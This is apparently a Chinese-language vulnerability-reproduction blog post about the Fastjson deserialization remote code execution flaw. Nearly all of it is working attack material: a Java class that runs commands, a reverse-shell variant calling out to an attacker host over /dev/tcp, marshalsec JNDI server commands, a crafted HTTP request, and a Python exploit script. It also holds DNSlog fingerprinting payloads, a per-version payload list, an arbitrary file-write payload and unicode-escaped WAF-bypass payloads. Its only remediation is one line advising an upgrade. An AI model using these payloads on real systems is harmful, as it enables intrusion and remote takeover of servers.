- A+
所属分类:漏洞复现
简介
Fastjson 是一个 Java 库,可以将 Java 对象转换为 JSON 格式,当然它也可以将 JSON 字符串转换为 Java 对象。
Fastjson 可以操作任何 Java 对象,即使是一些预先存在的没有源码的对象。
poc
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 |
//FileName:Exploit.java import java.io.BufferedReader; import java.io.InputStream; import java.io.InputStreamReader; public class Exploit{ public Exploit() throws Exception { Process p = Runtime.getRuntime().exec(new String[]{"bash", "-c", "touch /tmp/exphub"}); InputStream is = p.getInputStream(); BufferedReader reader = new BufferedReader(new InputStreamReader(is)); String line; while((line = reader.readLine()) != null) { System.out.println(line); } p.waitFor(); is.close(); reader.close(); p.destroy(); } public static void main(String[] args) throws Exception { } } |
编译成class的文件上传到vps。
|
1 |
javac Exploit.java |
通过python3 启动http服务,将poc移至改目录。
|
1 |
python3 -m http.server 8888 |
开启远程加载类服务,可以通过Jrmp服务或者Ldap服务加载远程类文件
JRMP服务
|
1 |
java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.RMIRefServer "http://vps:8888/#Exploit" 9999 |
构造数据包加载远程类
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 |
POST / HTTP/1.1 Host: your-ip:8090 Accept-Encoding: gzip, deflate Accept: */* Accept-Language: en User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0) Connection: close Content-Type: application/json Content-Length: 160 { "b":{ "@type":"com.sun.rowset.JdbcRowSetImpl", "dataSourceName":"rmi://vps:9999/TouchFile", "autoCommit":true } } |
文件被创建,命令执行成功
反弹shell
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 |
import java.io.BufferedReader; import java.io.InputStream; import java.io.InputStreamReader; public class Exploit{ public Exploit() throws Exception { Process p = Runtime.getRuntime().exec(new String[]{"bash", "-c", "bash -i >& /dev/tcp/vps/55555 0>&1"}); InputStream is = p.getInputStream(); BufferedReader reader = new BufferedReader(new InputStreamReader(is)); String line; while((line = reader.readLine()) != null) { System.out.println(line); } p.waitFor(); is.close(); reader.close(); p.destroy(); } public static void main(String[] args) throws Exception { } } |
工具附件
脚本检测:
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 |
#FileName:fastjson-1.2.24_rce.py import sys import requests if len(sys.argv)!=3: print('+------------------------------------------------------------------------------------+') print('+ RMIServer: rmi://ip:port/exp +') print('+ LDAPServer: ldap://ip:port/exp +') print('+------------------------------------------------------------------------------------+') print('+ USE: python3 <filename> <target-ip> <RMI/LDAPServer> +') print('+ EXP: python3 fastjson-1.2.24_rce.py http://1.1.1.1:8080/ ldap://2.2.2.2:88/Object +') print('+ VER: fastjson<=1.2.24 +') print('+------------------------------------------------------------------------------------+') sys.exit() url = sys.argv[1] server = sys.argv[2] headers = { 'Host': "127.0.0.1", 'Content-Type': "application/json", 'Accept-Encoding': "gzip, deflate", 'Connection': "close", 'Accept': "*/*", 'User-Agent': "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.100 Safari/537.36" } payload = ''' { "b":{ "@type":"com.sun.rowset.JdbcRowSetImpl", "dataSourceName":"%s", "autoCommit":true } } ''' %server try: r = requests.post(url, payload, headers=headers, timeout=10) print ("[+] RMI/LDAP Send Success ") except: print ("[-] RMI/LDAP Send Failed ") |
|
1 |
python fastjson-1.2.24_rce.py |
识别fastjson
判断版本
|
1 2 3 |
[{"a":"a\x] {"@type":"java.lang.AutoCloseable" a |
dnslog判断
未报错poc
|
1 2 3 |
{"x":{"@type":"java.net.InetSocketAddress"{"address":,"val":"dnslog"}}} {"x":{{"@type":"java.net.URL","val":"http://dnslog"}:"x"}} {"x":{"@type":"com.alibaba.fastjson.JSONObject", {"@type": "java.net.URL", "val":"http://dnslog"}}""}} |
报错,但仍有效
|
1 2 3 |
{"x":{"@type":"java.net.Inet4Address","val":"dnslog"}} {"x":{"@type":"java.net.Inet6Address","val":"dnslog"}} {"x":Set[{"@type":"java.net.URL","val":"http://dnslog"}]} |
报错,且返回400,但仍有效
|
1 2 |
{"x":Set[{"@type":"java.net.URL","val":"http://dnslog"}} {"x":{{"@type":"java.net.URL","val":"http://dnslog"}:0} |
常规poc集
不同版本的常规poc
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 |
1.2.24 {"b":{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"rmi://localhost:1099/Exploit", "autoCommit":true}} 未知版本(1.2.24-41之间) {"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"rmi://localhost:1099/Exploit","autoCommit":true} 1.2.41 {"@type":"Lcom.sun.rowset.RowSetImpl;","dataSourceName":"rmi://localhost:1099/Exploit","autoCommit":true} 1.2.42 {"@type":"LLcom.sun.rowset.JdbcRowSetImpl;;","dataSourceName":"rmi://localhost:1099/Exploit","autoCommit":true}; 1.2.43 {"@type":"[com.sun.rowset.JdbcRowSetImpl"[{"dataSourceName":"rmi://localhost:1099/Exploit","autoCommit":true]} 1.2.45 {"@type":"org.apache.ibatis.datasource.jndi.JndiDataSourceFactory","properties":{"data_source":"rmi://localhost:1099/Exploit"}} 1.2.47 {"a":{"@type":"java.lang.Class","val":"com.sun.rowset.JdbcRowSetImpl"},"b":{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"rmi://localhost:1099/Exploit","autoCommit":true}}} 1.2.59 {"v59_error":{"@type":"com.zaxxer.hikari.HikariConfig","metricRegistry":"ldap://127.0.0.1"}} {"v59_error":{"@type":"com.zaxxer.hikari.HikariConfig","healthCheckRegistry":"ldap://127.0.0.1"}} 1.2.61 {"v61_error":{"@type":"org.apache.commons.proxy.provider.remoting.SessionBeanProvider","jndiName":"rmi://127.0.0.1"}} {"v61_error":{"@type":"org.apache.commons.proxy.provider.remoting.SessionBeanProvider","jndiName":"ldap://127.0.0.1","Object":"a"}} 1.2.62 {"v62":{"@type":"org.apache.xbean.propertyeditor.JndiConverter","asText":"ldap://0.0.0.0"}} {"v62_error":{"@type":"com.ibatis.sqlmap.engine.transaction.jta.JtaTransactionConfig","properties": {"@type":"java.util.Properties","UserTransaction":"ldap://0.0.0.0"}}} {"v62_error":{"@type":"br.com.anteros.dbcp.AnterosDBCPConfig","healthCheckRegistry":"ldap://0.0.0.0"}} {"v62_error":{"@type":"org.apache.cocoon.components.slide.impl.JMSContentInterceptor","parameters": {"@type":"java.util.Hashtable","java.naming.factory.initial":"com.sun.jndi.rmi.registry.RegistryContextFactory","topic-factory":"ldap://0.0.0.0"},"namespace":""}} 1.2.66 {"v66":{"@type":"org.apache.shiro.realm.jndi.JndiRealmFactory","jndiNames":["ldap://0.0.0.0"],"Realms":[""]}} {"v66":{"@type":"org.apache.shiro.jndi.JndiObjectFactory","resourceName":"ldap://0.0.0.0"}} {"v66_error":{"@type":"br.com.anteros.dbcp.AnterosDBCPConfig","metricRegistry":"ldap://0.0.0.0"}} {"v66_error":{"@type":"org.apache.ignite.cache.jta.jndi.CacheJndiTmLookup","jndiNames":"ldap://0.0.0.0"}} 1.2.68 |
任意文件写入poc
|
1 2 3 |
{"x":{"@type":"java.lang.AutoCloseable","@type":"sun.rmi.server.MarshalOutputStream","out":{"@type":"java.util.zip.InflaterOutputStream","out":{"@type":"java.io.FileOutputStream","file":"/usr/lib/jvm/java-1.8.0-openjdk-1.8.0.282.b08-1.el7_9.x86_64/jre/lib/charsets.jar","append":false},"infl":{"input":"xxx"},"bufLen":1048576},"protocolVersion":1}} {"x":{"@type":"java.nio.charset.Charset","val":"500"}} |
绕waf paylaod:
|
1 |
{"b":{"\u0040\u0074\u0079\u0070\u0065":"\u0063\u006f\u006d\u002e\u0073\u0075\u006e\u002e\u0072\u006f\u0077\u0073\u0065\u0074\u002e\u004a\u0064\u0062\u0063\u0052\u006f\u0077\u0053\u0065\u0074\u0049\u006d\u0070\u006c","\u0064\u0061\u0074\u0061\u0053\u006f\u0075\u0072\u0063\u0065\u004e\u0061\u006d\u0065":"ldap://t00ls.5cd37009d59fc2c7fc55f2bee57cafab.dnslog.cn/aaa","autoCommit":true}} |
XCTF-校战“疫”中的ctf题目的一个payload:
\x74
|
1 |
{"@\x74ype":"org.apache.commons.configuration.JNDIConfiguration","- prefix":"rmi://111.231.17.208:3888"} |
|
1 |
{"@type":\b"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"rmi://127.0.0.1:9999","autoCommit":true}} |
|
1 |
{"@type":/**/"Lcom.sun.rowset.JdbcRowSetImpl","dataSourceName":"###RMI_LDAP_ADDRESS###","autoCommit":true} |
修复建议
升级fastjson到最新版本
- 我的微信
- 这是我的微信扫一扫
-
- 我的微信公众号
- 我的微信公众号扫一扫
-
